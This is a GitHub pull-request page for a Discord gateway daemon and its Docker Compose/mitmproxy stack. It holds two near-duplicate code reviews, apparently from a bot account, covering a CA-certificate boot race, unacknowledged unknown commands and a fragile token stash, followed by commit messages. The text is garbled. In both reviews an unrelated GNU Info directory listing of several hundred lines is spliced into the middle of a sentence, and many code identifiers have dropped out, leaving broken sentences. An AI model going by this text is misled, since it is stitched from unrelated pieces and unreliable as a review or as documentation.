feat(gateway): Unit 4 — gateway daemon skeleton + Docker Compose stack#635
Merged
Conversation
fro-bot
requested changes
May 17, 2026
Owner
fro-bot
left a comment
fro-bot
left a comment
There was a problem hiding this comment.
Verdict: CONDITIONAL
Can merge after addressing the three blocking issues below.
Blocking issues
1. volume is readable before CA is written — race on first boot
mounts the named volume into as and sets to a path inside it. But the gateway's only waits for the mitmproxy container to start, not for it to write the CA cert file. On a fresh volume mitmproxy needs several seconds to generate the key pair; if the gateway container starts (and Node.js is launched) before the cert is written, points at a non-existent file. Node silently ignores a missing extra-CA path, so the gateway will successfully connect to Discord (which doesn't go through mitmproxy), but any HTTPS call routed through the proxy will fail TLS verification. The advertised security posture is broken for the window between container start and cert availability.
Fix options: change the condition to and add a healthcheck to the mitmproxy service that tests for the cert file, or run as a pre-compose step and document it as required (the script is already idempotent). The README already recommends ; making it a hard dependency in is the lower-churn path.
2. returns on unknown command — unhandled rejection in production
fires inside an event listener. returns for any name not in the registry. on a failed Effect rejects the promise, and the at line 72 logs the error — so far fine.
The real risk is that any unregistered interaction that reaches the gateway (e.g. a stale global command that was deleted from the registry but not from Discord, or a command injected by another bot in the same guild) produces a logged error on every invocation but is never acknowledged back to Discord. Discord requires a response within 3 seconds; after that the interaction token expires and the user sees "This interaction failed". The correct first response should be before failing the Effect. This is a correctness/UX issue, not just a nit.
3. private field stash is fragile
does:
and reads it back:
This couples two files through an undocumented property on a third-party class. discord.js sets after is called, so is always before login — but is called before in . The stash exists to work around this ordering constraint, but it's invisible to any future author who reads in isolation.
The fix is straightforward: accept as a plain parameter to instead of reading it off the client. already has available at the call site.
Non-blocking concerns
-
** — wildcards match the base domain too** ( branch in ). This means also allows bare . That's probably intentional but worth a comment.
-
** after setting ** in : mitmproxy docs say setting is sufficient to short-circuit the connection; calling afterwards is redundant (and may produce a noisy log line on some mitmproxy versions). Low risk but worth cleaning up.
-
** routes File: dir, Node: Top This is the top of the INFO tree
This (the Directory node) gives a menu of major topics.
Typing "q" exits, "H" lists all Info commands, "d" returns here,
"h" gives a primer for first-timers,
"mEmacs" visits the Emacs manual, etc.In Emacs, you can click mouse button 2 on a menu item or cross reference
to select it.
- Menu:
Basics
- Common options: (coreutils)Common options.
- Coreutils: (coreutils). Core GNU (file, text, shell) utilities.
- Date input formats: (coreutils)Date input formats.
- Ed: (ed). The GNU line editor
- File permissions: (coreutils)File permissions.
Access modes. - Finding files: (find). Operating on files matching certain criteria.
- Time: (time). time
Compression
- Gzip: (gzip). General (de)compression of files (lzw).
Development
- libffi: (libffi). Portable foreign function interface library.
Editors
- nano: (nano). Small and friendly text editor.
General Commands
- Screen: (screen). Full-screen window manager.
GNU organization
- Maintaining Findutils: (find-maint).
Maintaining GNU findutils
GNU Utilities
- dirmngr-client: (gnupg). X.509 CRL and OCSP client.
- dirmngr: (gnupg). X.509 CRL and OCSP server.
- gpg-agent: (gnupg). The secret key daemon.
- gpg2: (gnupg). OpenPGP encryption and signing tool.
- gpgsm: (gnupg). S/MIME encryption and signing tool.
Individual utilities
- aclocal-invocation: (automake-1.16)aclocal Invocation.
Generating aclocal.m4. - arch: (coreutils)arch invocation. Print machine hardware name.
- automake-invocation: (automake-1.16)automake Invocation.
Generating Makefile.in. - b2sum: (coreutils)b2sum invocation. Print or check BLAKE2 digests.
- base32: (coreutils)base32 invocation. Base32 encode/decode data.
- base64: (coreutils)base64 invocation. Base64 encode/decode data.
- basename: (coreutils)basename invocation. Strip directory and suffix.
- basenc: (coreutils)basenc invocation. Encoding/decoding of data.
- cat: (coreutils)cat invocation. Concatenate and write files.
- chcon: (coreutils)chcon invocation. Change SELinux CTX of files.
- chgrp: (coreutils)chgrp invocation. Change file groups.
- chmod: (coreutils)chmod invocation. Change access permissions.
- chown: (coreutils)chown invocation. Change file owners and groups.
- chroot: (coreutils)chroot invocation. Specify the root directory.
- cksum: (coreutils)cksum invocation. Print POSIX CRC checksum.
- cmp: (diffutils)Invoking cmp. Compare 2 files byte by byte.
- comm: (coreutils)comm invocation. Compare sorted files by line.
- cp: (coreutils)cp invocation. Copy files.
- csplit: (coreutils)csplit invocation. Split by context.
- cut: (coreutils)cut invocation. Print selected parts of lines.
- date: (coreutils)date invocation. Print/set system date and time.
- dd: (coreutils)dd invocation. Copy and convert a file.
- df: (coreutils)df invocation. Report file system usage.
- diff3: (diffutils)Invoking diff3. Compare 3 files line by line.
- diff: (diffutils)Invoking diff. Compare 2 files line by line.
- dir: (coreutils)dir invocation. List directories briefly.
- dircolors: (coreutils)dircolors invocation. Color setup for ls.
- dirname: (coreutils)dirname invocation. Strip last file name component.
- du: (coreutils)du invocation. Report file usage.
- echo: (coreutils)echo invocation. Print a line of text.
- env: (coreutils)env invocation. Modify the environment.
- expand: (coreutils)expand invocation. Convert tabs to spaces.
- expr: (coreutils)expr invocation. Evaluate expressions.
- factor: (coreutils)factor invocation. Print prime factors
- false: (coreutils)false invocation. Do nothing, unsuccessfully.
- find: (find)Invoking find. Finding and acting on files.
- fmt: (coreutils)fmt invocation. Reformat paragraph text.
- fold: (coreutils)fold invocation. Wrap long input lines.
- groups: (coreutils)groups invocation. Print group names a user is in.
- gunzip: (gzip)Overview. Decompression.
- gzexe: (gzip)Overview. Compress executables.
- head: (coreutils)head invocation. Output the first part of files.
- hostid: (coreutils)hostid invocation. Print numeric host identifier.
- hostname: (coreutils)hostname invocation. Print or set system name.
- id: (coreutils)id invocation. Print user identity.
- install: (coreutils)install invocation. Copy files and set attributes.
- join: (coreutils)join invocation. Join lines on a common field.
- kill: (coreutils)kill invocation. Send a signal to processes.
- link: (coreutils)link invocation. Make hard links between files.
- ln: (coreutils)ln invocation. Make links between files.
- locate: (find)Invoking locate. Finding files in a database.
- logname: (coreutils)logname invocation. Print current login name.
- ls: (coreutils)ls invocation. List directory contents.
- md5sum: (coreutils)md5sum invocation. Print or check MD5 digests.
- mkdir: (coreutils)mkdir invocation. Create directories.
- mkfifo: (coreutils)mkfifo invocation. Create FIFOs (named pipes).
- mknod: (coreutils)mknod invocation. Create special files.
- mktemp: (coreutils)mktemp invocation. Create temporary files.
- mv: (coreutils)mv invocation. Rename files.
- nice: (coreutils)nice invocation. Modify niceness.
- nl: (coreutils)nl invocation. Number lines and write files.
- nohup: (coreutils)nohup invocation. Immunize to hangups.
- nproc: (coreutils)nproc invocation. Print the number of processors.
- numfmt: (coreutils)numfmt invocation. Reformat numbers.
- od: (coreutils)od invocation. Dump files in octal, etc.
- paste: (coreutils)paste invocation. Merge lines of files.
- patch: (diffutils)Invoking patch. Apply a patch to a file.
- pathchk: (coreutils)pathchk invocation. Check file name portability.
- pr: (coreutils)pr invocation. Paginate or columnate files.
- printenv: (coreutils)printenv invocation. Print environment variables.
- printf: (coreutils)printf invocation. Format and print data.
- ptx: (coreutils)ptx invocation. Produce permuted indexes.
- pwd: (coreutils)pwd invocation. Print working directory.
- readlink: (coreutils)readlink invocation. Print referent of a symlink.
- realpath: (coreutils)realpath invocation. Print resolved file names.
- rm: (coreutils)rm invocation. Remove files.
- rmdir: (coreutils)rmdir invocation. Remove empty directories.
- runcon: (coreutils)runcon invocation. Run in specified SELinux CTX.
- sdiff: (diffutils)Invoking sdiff. Merge 2 files side-by-side.
- seq: (coreutils)seq invocation. Print numeric sequences
- sha1sum: (coreutils)sha1sum invocation. Print or check SHA-1 digests.
- sha2: (coreutils)sha2 utilities. Print or check SHA-2 digests.
- shred: (coreutils)shred invocation. Remove files more securely.
- shuf: (coreutils)shuf invocation. Shuffling text files.
- sleep: (coreutils)sleep invocation. Delay for a specified time.
- sort: (coreutils)sort invocation. Sort text files.
- split: (coreutils)split invocation. Split into pieces.
- stat: (coreutils)stat invocation. Report file(system) status.
- stdbuf: (coreutils)stdbuf invocation. Modify stdio buffering.
- stty: (coreutils)stty invocation. Print/change terminal settings.
- sum: (coreutils)sum invocation. Print traditional checksum.
- sync: (coreutils)sync invocation. Sync files to stable storage.
- tac: (coreutils)tac invocation. Reverse files.
- tail: (coreutils)tail invocation. Output the last part of files.
- tee: (coreutils)tee invocation. Redirect to multiple files.
- test: (coreutils)test invocation. File/string tests.
- timeout: (coreutils)timeout invocation. Run with time limit.
- touch: (coreutils)touch invocation. Change file timestamps.
- tr: (coreutils)tr invocation. Translate characters.
- true: (coreutils)true invocation. Do nothing, successfully.
- truncate: (coreutils)truncate invocation. Shrink/extend size of a file.
- tsort: (coreutils)tsort invocation. Topological sort.
- tty: (coreutils)tty invocation. Print terminal name.
- uname: (coreutils)uname invocation. Print system information.
- unexpand: (coreutils)unexpand invocation. Convert spaces to tabs.
- uniq: (coreutils)uniq invocation. Uniquify files.
- unlink: (coreutils)unlink invocation. Removal via unlink(2).
- updatedb: (find)Invoking updatedb. Building the locate database.
- uptime: (coreutils)uptime invocation. Print uptime and load.
- users: (coreutils)users invocation. Print current user names.
- vdir: (coreutils)vdir invocation. List directories verbosely.
- wc: (coreutils)wc invocation. Line, word, and byte counts.
- who: (coreutils)who invocation. Print who is logged in.
- whoami: (coreutils)whoami invocation. Print effective user ID.
- xargs: (find)Invoking xargs. Operating on many files.
- yes: (coreutils)yes invocation. Print a string indefinitely.
- zcat: (gzip)Overview. Decompression to stdout.
- zdiff: (gzip)Overview. Compare compressed files.
- zforce: (gzip)Overview. Force .gz extension on files.
- zgrep: (gzip)Overview. Search compressed files.
- zmore: (gzip)Overview. Decompression output by pages.
Kernel
- GRUB: (grub). The GRand Unified Bootloader
- grub-dev: (grub-dev). The GRand Unified Bootloader Dev
- grub-install: (grub)Invoking grub-install.
Install GRUB on your drive - grub-mkconfig: (grub)Invoking grub-mkconfig.
Generate GRUB configuration - grub-mkpasswd-pbkdf2: (grub)Invoking grub-mkpasswd-pbkdf2.
- grub-mkrelpath: (grub)Invoking grub-mkrelpath.
- grub-mkrescue: (grub)Invoking grub-mkrescue.
Make a GRUB rescue image - grub-mount: (grub)Invoking grub-mount.
Mount a file system using GRUB - grub-probe: (grub)Invoking grub-probe.
Probe device information - grub-script-check: (grub)Invoking grub-script-check.
Libraries
- RLuserman: (rluserman). The GNU readline library User's Manual.
Math
- bc: (bc). An arbitrary precision calculator language.
Network applications
- Wget: (wget). Non-interactive network downloader.
Programming
- flex: (flex). Fast lexical analyzer generator (lex
replacement).
Software development
- Automake: (automake-1.16). Making GNU standards-compliant Makefiles.
- Automake-history: (automake-history).
History of Automake development.
Texinfo documentation system
- info stand-alone: (info-stnd).
Read Info documents without Emacs. - install-info: (texinfo)Invoking install-info.
Update info/dir entries. - makeinfo: (texinfo)Invoking texi2any.
Translate Texinfo source. - pdftexi2dvi: (texinfo)PDF Output.
PDF output for Texinfo. - pod2texi: (pod2texi)Invoking pod2texi.
Translate Perl Pod to Texinfo. - texi2any: (texinfo)Invoking texi2any.
Translate Texinfo source. - texi2any customization: (texi2any_api).
Customizing texi2any output - texi2any modules: (texi2any_internals).
Texinfo Perl modules used in texi2any - texi2dvi: (texinfo)Format with texi2dvi.
Print Texinfo documents. - texi2pdf: (texinfo)PDF Output.
PDF output for Texinfo. - texindex: (texinfo)Format with tex/texindex.
Sort Texinfo index files. - Texinfo: (texinfo). The GNU documentation format.
Text creation and manipulation
- Diffutils: (diffutils). Comparing and merging files.
- M4: (m4). A powerful macro processor.
- grep: (grep). Print lines that match patterns.
- sed: (sed). Stream EDitor. and to ** (main.ts:26-29). The comment explains the linting constraint, but this will be confusing in any log aggregator that distinguishes warn-level lines. A lint suppression comment () on a call would be cleaner and avoid polluting the warn stream with routine info messages.
- Shutdown handler double-exit risk — if the process receives both SIGTERM and SIGINT in quick succession, is registered for both signals and both invocations race on . Each call creates its own and ; is called twice. discord.js is idempotent in practice, but the second call after the first has already exited is undefined behaviour (process is gone). Low blast radius since it only matters in a very narrow signal-delivery window, but noting it.
Missing tests
- No test for the first-boot race condition in the Docker stack (infrastructure-level, acceptable gap for v1).
- No test covering the "unknown command" reply path once it's fixed (see blocking issue #2).
- unknown-command test (index.test.ts:37) asserts but doesn't assert that the interaction received an ephemeral reply — once the fix lands that assertion should be added.
Risk assessment (MED):
The gateway skeleton is solid and the Effect/Result boundary is clean. The blocking items are correctness issues rather than security holes: the TLS race is a deployment correctness issue (window where egress filtering silently doesn't apply), the unknown-command path is a UX correctness issue (interaction timeout), and the stash is a maintainability time-bomb. None are exploitable in the v1 threat model, but all three are straightforward to fix before merge.
Run Summary
| Field | Value |
|---|---|
| Event | pull_request |
| Repository | fro-bot/agent |
| Run ID | 25985024787 |
| Cache | hit |
| Session | ses_1cb177d37ffeWExM4ScTjO7bhq |
fro-bot
requested changes
May 17, 2026
Owner
fro-bot
left a comment
fro-bot
left a comment
There was a problem hiding this comment.
Verdict: CONDITIONAL
Can merge after addressing the three blocking issues below.
Blocking issues
1. volume readable before CA is written — race on first boot
mounts the named volume into as and sets to a path inside it. The gateway's only waits for the container to start, not for the CA cert file to be written. On a fresh volume mitmproxy needs several seconds to generate the key pair. If the gateway container (and Node.js) start before the cert exists, points at a missing file. Node silently ignores a missing extra-CA path, so the gateway connects to Discord fine, but any HTTPS call routed through mitmproxy fails TLS verification. The egress security posture is broken for this window.
Fix options: (a) change the condition to and add a mitmproxy healthcheck that asserts the cert file exists, or (b) document and enforce as a required pre-start step (the script is already idempotent and the README already recommends it). Option (b) is lower churn.
2. Unknown leaves interaction unacknowledged
fires inside an event listener. returns for any name not in the registry; the at line 72 logs it. The problem is that the interaction is never replied to. Discord requires a response within 3 seconds; after that the interaction token expires and the user sees "This interaction failed". Any stale global command (deleted from the registry but not from Discord) or same-guild command from another bot hits this path on every invocation.
Fix: call before (or instead of) returning .
3. stash is a hidden coupling between two files
writes and reads it back with the same cast. This couples two files through an undocumented property on a third-party class, and is invisible to any future author reading in isolation.
Clean fix: add as an explicit parameter to . already has at the call site.
Non-blocking concerns
-
** wildcard logic also allows the bare base domain.** The branch in means allows bare too. Probably intentional; a comment would confirm it.
-
** after setting ** in is redundant per mitmproxy docs — setting already short-circuits the connection. Harmless, but may emit an extra log line on some versions.
-
** routes File: dir, Node: Top This is the top of the INFO tree
This (the Directory node) gives a menu of major topics.
Typing "q" exits, "H" lists all Info commands, "d" returns here,
"h" gives a primer for first-timers,
"mEmacs" visits the Emacs manual, etc.In Emacs, you can click mouse button 2 on a menu item or cross reference
to select it.
- Menu:
Basics
- Common options: (coreutils)Common options.
- Coreutils: (coreutils). Core GNU (file, text, shell) utilities.
- Date input formats: (coreutils)Date input formats.
- Ed: (ed). The GNU line editor
- File permissions: (coreutils)File permissions.
Access modes. - Finding files: (find). Operating on files matching certain criteria.
- Time: (time). time
Compression
- Gzip: (gzip). General (de)compression of files (lzw).
Development
- libffi: (libffi). Portable foreign function interface library.
Editors
- nano: (nano). Small and friendly text editor.
General Commands
- Screen: (screen). Full-screen window manager.
GNU organization
- Maintaining Findutils: (find-maint).
Maintaining GNU findutils
GNU Utilities
- dirmngr-client: (gnupg). X.509 CRL and OCSP client.
- dirmngr: (gnupg). X.509 CRL and OCSP server.
- gpg-agent: (gnupg). The secret key daemon.
- gpg2: (gnupg). OpenPGP encryption and signing tool.
- gpgsm: (gnupg). S/MIME encryption and signing tool.
Individual utilities
- aclocal-invocation: (automake-1.16)aclocal Invocation.
Generating aclocal.m4. - arch: (coreutils)arch invocation. Print machine hardware name.
- automake-invocation: (automake-1.16)automake Invocation.
Generating Makefile.in. - b2sum: (coreutils)b2sum invocation. Print or check BLAKE2 digests.
- base32: (coreutils)base32 invocation. Base32 encode/decode data.
- base64: (coreutils)base64 invocation. Base64 encode/decode data.
- basename: (coreutils)basename invocation. Strip directory and suffix.
- basenc: (coreutils)basenc invocation. Encoding/decoding of data.
- cat: (coreutils)cat invocation. Concatenate and write files.
- chcon: (coreutils)chcon invocation. Change SELinux CTX of files.
- chgrp: (coreutils)chgrp invocation. Change file groups.
- chmod: (coreutils)chmod invocation. Change access permissions.
- chown: (coreutils)chown invocation. Change file owners and groups.
- chroot: (coreutils)chroot invocation. Specify the root directory.
- cksum: (coreutils)cksum invocation. Print POSIX CRC checksum.
- cmp: (diffutils)Invoking cmp. Compare 2 files byte by byte.
- comm: (coreutils)comm invocation. Compare sorted files by line.
- cp: (coreutils)cp invocation. Copy files.
- csplit: (coreutils)csplit invocation. Split by context.
- cut: (coreutils)cut invocation. Print selected parts of lines.
- date: (coreutils)date invocation. Print/set system date and time.
- dd: (coreutils)dd invocation. Copy and convert a file.
- df: (coreutils)df invocation. Report file system usage.
- diff3: (diffutils)Invoking diff3. Compare 3 files line by line.
- diff: (diffutils)Invoking diff. Compare 2 files line by line.
- dir: (coreutils)dir invocation. List directories briefly.
- dircolors: (coreutils)dircolors invocation. Color setup for ls.
- dirname: (coreutils)dirname invocation. Strip last file name component.
- du: (coreutils)du invocation. Report file usage.
- echo: (coreutils)echo invocation. Print a line of text.
- env: (coreutils)env invocation. Modify the environment.
- expand: (coreutils)expand invocation. Convert tabs to spaces.
- expr: (coreutils)expr invocation. Evaluate expressions.
- factor: (coreutils)factor invocation. Print prime factors
- false: (coreutils)false invocation. Do nothing, unsuccessfully.
- find: (find)Invoking find. Finding and acting on files.
- fmt: (coreutils)fmt invocation. Reformat paragraph text.
- fold: (coreutils)fold invocation. Wrap long input lines.
- groups: (coreutils)groups invocation. Print group names a user is in.
- gunzip: (gzip)Overview. Decompression.
- gzexe: (gzip)Overview. Compress executables.
- head: (coreutils)head invocation. Output the first part of files.
- hostid: (coreutils)hostid invocation. Print numeric host identifier.
- hostname: (coreutils)hostname invocation. Print or set system name.
- id: (coreutils)id invocation. Print user identity.
- install: (coreutils)install invocation. Copy files and set attributes.
- join: (coreutils)join invocation. Join lines on a common field.
- kill: (coreutils)kill invocation. Send a signal to processes.
- link: (coreutils)link invocation. Make hard links between files.
- ln: (coreutils)ln invocation. Make links between files.
- locate: (find)Invoking locate. Finding files in a database.
- logname: (coreutils)logname invocation. Print current login name.
- ls: (coreutils)ls invocation. List directory contents.
- md5sum: (coreutils)md5sum invocation. Print or check MD5 digests.
- mkdir: (coreutils)mkdir invocation. Create directories.
- mkfifo: (coreutils)mkfifo invocation. Create FIFOs (named pipes).
- mknod: (coreutils)mknod invocation. Create special files.
- mktemp: (coreutils)mktemp invocation. Create temporary files.
- mv: (coreutils)mv invocation. Rename files.
- nice: (coreutils)nice invocation. Modify niceness.
- nl: (coreutils)nl invocation. Number lines and write files.
- nohup: (coreutils)nohup invocation. Immunize to hangups.
- nproc: (coreutils)nproc invocation. Print the number of processors.
- numfmt: (coreutils)numfmt invocation. Reformat numbers.
- od: (coreutils)od invocation. Dump files in octal, etc.
- paste: (coreutils)paste invocation. Merge lines of files.
- patch: (diffutils)Invoking patch. Apply a patch to a file.
- pathchk: (coreutils)pathchk invocation. Check file name portability.
- pr: (coreutils)pr invocation. Paginate or columnate files.
- printenv: (coreutils)printenv invocation. Print environment variables.
- printf: (coreutils)printf invocation. Format and print data.
- ptx: (coreutils)ptx invocation. Produce permuted indexes.
- pwd: (coreutils)pwd invocation. Print working directory.
- readlink: (coreutils)readlink invocation. Print referent of a symlink.
- realpath: (coreutils)realpath invocation. Print resolved file names.
- rm: (coreutils)rm invocation. Remove files.
- rmdir: (coreutils)rmdir invocation. Remove empty directories.
- runcon: (coreutils)runcon invocation. Run in specified SELinux CTX.
- sdiff: (diffutils)Invoking sdiff. Merge 2 files side-by-side.
- seq: (coreutils)seq invocation. Print numeric sequences
- sha1sum: (coreutils)sha1sum invocation. Print or check SHA-1 digests.
- sha2: (coreutils)sha2 utilities. Print or check SHA-2 digests.
- shred: (coreutils)shred invocation. Remove files more securely.
- shuf: (coreutils)shuf invocation. Shuffling text files.
- sleep: (coreutils)sleep invocation. Delay for a specified time.
- sort: (coreutils)sort invocation. Sort text files.
- split: (coreutils)split invocation. Split into pieces.
- stat: (coreutils)stat invocation. Report file(system) status.
- stdbuf: (coreutils)stdbuf invocation. Modify stdio buffering.
- stty: (coreutils)stty invocation. Print/change terminal settings.
- sum: (coreutils)sum invocation. Print traditional checksum.
- sync: (coreutils)sync invocation. Sync files to stable storage.
- tac: (coreutils)tac invocation. Reverse files.
- tail: (coreutils)tail invocation. Output the last part of files.
- tee: (coreutils)tee invocation. Redirect to multiple files.
- test: (coreutils)test invocation. File/string tests.
- timeout: (coreutils)timeout invocation. Run with time limit.
- touch: (coreutils)touch invocation. Change file timestamps.
- tr: (coreutils)tr invocation. Translate characters.
- true: (coreutils)true invocation. Do nothing, successfully.
- truncate: (coreutils)truncate invocation. Shrink/extend size of a file.
- tsort: (coreutils)tsort invocation. Topological sort.
- tty: (coreutils)tty invocation. Print terminal name.
- uname: (coreutils)uname invocation. Print system information.
- unexpand: (coreutils)unexpand invocation. Convert spaces to tabs.
- uniq: (coreutils)uniq invocation. Uniquify files.
- unlink: (coreutils)unlink invocation. Removal via unlink(2).
- updatedb: (find)Invoking updatedb. Building the locate database.
- uptime: (coreutils)uptime invocation. Print uptime and load.
- users: (coreutils)users invocation. Print current user names.
- vdir: (coreutils)vdir invocation. List directories verbosely.
- wc: (coreutils)wc invocation. Line, word, and byte counts.
- who: (coreutils)who invocation. Print who is logged in.
- whoami: (coreutils)whoami invocation. Print effective user ID.
- xargs: (find)Invoking xargs. Operating on many files.
- yes: (coreutils)yes invocation. Print a string indefinitely.
- zcat: (gzip)Overview. Decompression to stdout.
- zdiff: (gzip)Overview. Compare compressed files.
- zforce: (gzip)Overview. Force .gz extension on files.
- zgrep: (gzip)Overview. Search compressed files.
- zmore: (gzip)Overview. Decompression output by pages.
Kernel
- GRUB: (grub). The GRand Unified Bootloader
- grub-dev: (grub-dev). The GRand Unified Bootloader Dev
- grub-install: (grub)Invoking grub-install.
Install GRUB on your drive - grub-mkconfig: (grub)Invoking grub-mkconfig.
Generate GRUB configuration - grub-mkpasswd-pbkdf2: (grub)Invoking grub-mkpasswd-pbkdf2.
- grub-mkrelpath: (grub)Invoking grub-mkrelpath.
- grub-mkrescue: (grub)Invoking grub-mkrescue.
Make a GRUB rescue image - grub-mount: (grub)Invoking grub-mount.
Mount a file system using GRUB - grub-probe: (grub)Invoking grub-probe.
Probe device information - grub-script-check: (grub)Invoking grub-script-check.
Libraries
- RLuserman: (rluserman). The GNU readline library User's Manual.
Math
- bc: (bc). An arbitrary precision calculator language.
Network applications
- Wget: (wget). Non-interactive network downloader.
Programming
- flex: (flex). Fast lexical analyzer generator (lex
replacement).
Software development
- Automake: (automake-1.16). Making GNU standards-compliant Makefiles.
- Automake-history: (automake-history).
History of Automake development.
Texinfo documentation system
- info stand-alone: (info-stnd).
Read Info documents without Emacs. - install-info: (texinfo)Invoking install-info.
Update info/dir entries. - makeinfo: (texinfo)Invoking texi2any.
Translate Texinfo source. - pdftexi2dvi: (texinfo)PDF Output.
PDF output for Texinfo. - pod2texi: (pod2texi)Invoking pod2texi.
Translate Perl Pod to Texinfo. - texi2any: (texinfo)Invoking texi2any.
Translate Texinfo source. - texi2any customization: (texi2any_api).
Customizing texi2any output - texi2any modules: (texi2any_internals).
Texinfo Perl modules used in texi2any - texi2dvi: (texinfo)Format with texi2dvi.
Print Texinfo documents. - texi2pdf: (texinfo)PDF Output.
PDF output for Texinfo. - texindex: (texinfo)Format with tex/texindex.
Sort Texinfo index files. - Texinfo: (texinfo). The GNU documentation format.
Text creation and manipulation
- Diffutils: (diffutils). Comparing and merging files.
- M4: (m4). A powerful macro processor.
- grep: (grep). Print lines that match patterns.
- sed: (sed). Stream EDitor. and to ** (). The comment explains the linting constraint, but this poisons the warn stream for log aggregators. A per-line lint-suppression comment on a call would be cleaner.
- Shutdown double-exit risk. Both SIGTERM and SIGINT bind the same closure. If both signals arrive in quick succession, is called twice and two chains run concurrently. is idempotent in practice, but two calls race each other. Very narrow window; flagging for future hardening.
Missing tests
- No test for the first-boot cert race (infrastructure-level; acceptable gap for v1).
- No test for ephemeral-error reply on unknown command — add once blocking issue 2 is fixed.
- asserts on unknown command but does not assert that was called — add that assertion after the fix.
Risk assessment (MED)
The gateway skeleton is solid and the Effect/Result boundary is clean. The three blocking items are correctness issues, not security holes: the TLS race means egress filtering silently does not apply during the boot window; the unknown-command path causes visible interaction timeouts; the token stash is a maintainability trap. None are exploitable in the v1 threat model but all are quick to fix.
Run Summary
| Field | Value |
|---|---|
| Event | pull_request |
| Repository | fro-bot/agent |
| Run ID | 25985024787 |
| Cache | hit |
| Session | ses_1cb177d37ffeWExM4ScTjO7bhq |
Creates the empty package skeleton for the Discord-first gateway daemon. - package.json depends on @fro-bot/runtime (workspace) and effect 3.x - tsconfig.json + tsdown.config.ts mirror the runtime package's shape - src/main.ts is a placeholder; subsequent commits fill in: - runtime-effect.ts (Result<>→Effect adapter) - config.ts (env + secret reading) - discord/ (client, mentions, slash commands) - shutdown.ts (SIGTERM drain) - deploy/ (Docker Compose stack + mitmproxy) - AGENTS.md documents the Effect / Result<> boundary contract: only this package uses effect; the runtime stays on Result<>. Builds clean: tsc passes, tsdown produces dist/main.mjs. Part of Unit 4 in docs/plans/2026-04-18-001-feat-fro-bot-gateway-discord-v1-plan.md (sub-unit 4a).
…ions
Wraps every async function in @fro-bot/runtime that returns Result<T, E> with an
Effect.tryPromise + flatMap-on-Result pattern, exposing them as Effect<T, Error>.
Functions adapted:
- coordination/lock: acquireLock, releaseLock, renewLease, forceReleaseLock
- coordination/run-state: createRun, transitionRun, findStaleRuns
- coordination/self-test: validateProviderSemantics
- object-store/content-sync: syncSessionsToStore, syncSessionsFromStore,
syncArtifactsToStore, syncMetadataToStore
The four object-store helpers return plain {success, ...} shapes (not Result),
so they wrap via Effect.tryPromise only — no Result flatMap.
This file is the only place in the gateway package that imports from
@fro-bot/runtime directly; everything else consumes the Effect adapters,
keeping the Effect boundary explicit per packages/gateway/AGENTS.md.
Part of Unit 4 (sub-unit 4b) in
docs/plans/2026-04-18-001-feat-fro-bot-gateway-discord-v1-plan.md.
Tests: 65 across 12 describe blocks, covering happy/error/rejection paths.
Adds GatewayConfig type plus three helpers:
- readSecret(name): checks ${name}_FILE first (Docker secrets convention),
falls back to process.env[name]; throws clearly on missing
- readOptionalSecret(name): same precedence, returns null on missing
- loadGatewayConfig(): reads required (DISCORD_TOKEN, DISCORD_APPLICATION_ID,
S3_BUCKET, S3_REGION) + optional (DISCORD_GUILD_ID, S3_ENDPOINT, S3_PREFIX,
S3_SSE, GATEWAY_IDENTITY, LOG_LEVEL) and assembles a typed config
File-based secrets win over env vars when both are set; trailing whitespace
is trimmed from file contents. LOG_LEVEL is validated against the enum.
Part of Unit 4 (sub-unit 4c) in
docs/plans/2026-04-18-001-feat-fro-bot-gateway-discord-v1-plan.md.
Tests: 19 across readSecret (6), readOptionalSecret (2), loadGatewayConfig (11).
… handler
Skeleton wiring for the Discord-facing surface. Establishes the safety guards
and command dispatch shape; richer command set (queue, approvals, review)
arrives in Unit 6.
- discord/client.ts: createDiscordClient() locks allowedMentions to
{ parse: ['users'], repliedUser: false } to prevent @everyone / @here
pings. Wires shard lifecycle events (ready, disconnect, reconnect, error,
resume) to a structured logger. Intent overrides MERGE with defaults
(Guilds + GuildMessages + MessageContent + GuildMembers), dedup via Set.
- discord/commands/index.ts: SlashCommand type, registry, dispatchCommand
(returns Effect.fail on unknown command), registerSlashCommands (guild-
scoped when guildId set, global otherwise).
- discord/commands/ping.ts: /fro-bot ping → ephemeral 'pong' reply.
- discord/mentions.ts: handleMention() creates a thread on direct @-mention
and replies 'pong' in-thread; skips when message is already in a thread.
discord.js 14.26.4 pinned. tsconfig include adds ../runtime/src/**/*.ts to
satisfy TS following @fro-bot/runtime's exports.types → src/index.ts.
Part of Unit 4 (sub-unit 4d) in
docs/plans/2026-04-18-001-feat-fro-bot-gateway-discord-v1-plan.md.
Tests: 13 across client, commands/index, commands/ping, mentions.
Replaces the sub-unit 4a placeholder with the full entry point and adds the shutdown handler that drains in-flight Discord work before exiting. main.ts wiring (top-level Effect program): - Loads gateway config (config.loadGatewayConfig) - Creates Discord client with structured logger - Registers /fro-bot ping slash command (guild-scoped when DISCORD_GUILD_ID set, global otherwise) - Wires interactionCreate → dispatchCommand (chat-input commands only) - Wires messageCreate → handleMention (when bot is @-mentioned, non-bot author) - Installs shutdown handlers - client.login() shutdown.ts: - installShutdownHandlers(client, logger, drainMs = 25_000) returns a cleanup fn (for tests). On SIGTERM/SIGINT: starts drain timer, calls client.destroy, exits 0 on clean drain or 1 on timeout. Default drain matches Docker's 10s grace + 15s for SDK teardown. - Exports DEFAULT_DRAIN_MS for documentation/test reference. Part of Unit 4 (sub-unit 4e) in docs/plans/2026-04-18-001-feat-fro-bot-gateway-discord-v1-plan.md. Tests: 5 new in shutdown.test.ts; 70/70 total in gateway.
